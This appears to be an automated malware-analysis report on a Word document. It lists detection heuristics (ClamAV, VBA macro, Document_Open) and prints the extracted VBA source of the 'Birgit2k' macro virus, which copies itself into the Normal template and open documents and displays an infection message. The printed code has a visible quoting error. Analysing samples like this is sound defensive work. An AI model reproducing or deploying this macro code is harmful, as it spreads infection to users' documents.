MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The 'Document_Open' heuristic firing and the presence of a 'macros.bas' file indicate macro execution. The script explicitly mentions 'Birgit2k' and '$MOOTHI E's Macro Virus Creator 2000 Ver. 1.0', suggesting a macro-based virus designed to infect other documents. The macros attempt to copy themselves to the Normal template and the active document.
Heuristics 3
-
ClamAV: Doc.Trojan.Hmc-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Hmc-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1452 bytes |
SHA-256: 3f77d26f85d7ebb9b5a6ccbdaf37cb978c006670e2f184482f031e2473ea90ef |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
Private Sub Document_Close()
'Author: Doctor Rave
'Name: Birgit2k
'Comments:
'Origin: Swiss
'This code generated by $MOOTHiE's Macro Virus Creator 2000 Ver. 1.0
Dim Norm, NormCode, NormLines, Doc, DocCode, DocLines
Set Norm = NormalTemplate.VBProject.VBComponents(1)
Set Doc = ActiveDocument.VBProject.VBComponents(1)
Set DocCode = Doc.CodeModule: Set NormCode = Norm.CodeModule
If DocCode.lines(23, 1) = " Then
For y = 1 To DocCode.countoflines
DocCode.replacelines y, "$MOOTHiE's Macro Virus Creator 2000 Ver. 1.0"
Next y
For x = 2 To NormCode.countoflines
DocCode.insertlines 26 + x, NormCode.lines(x, 1)
Next x
End If
If NormCode.lines(23, 1) = "" Then
For y = 1 To NormCode.countoflines
NormCode.replacelines y, "$MOOTHiE's Macro Virus Creator 2000 Ver. 1.0"
Next y
For x = 1 To DocCode.countoflines
NormCode.insertlines 26 + x, DocCode.lines(x, 1)
Next x
End If
End Sub
Private Sub Document_Open()
End Sub
Private Sub Document_New()
MsgBox "You have been infected by the "Birgit2k" virus! Thank you, and have a nice day.", vbInformation
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.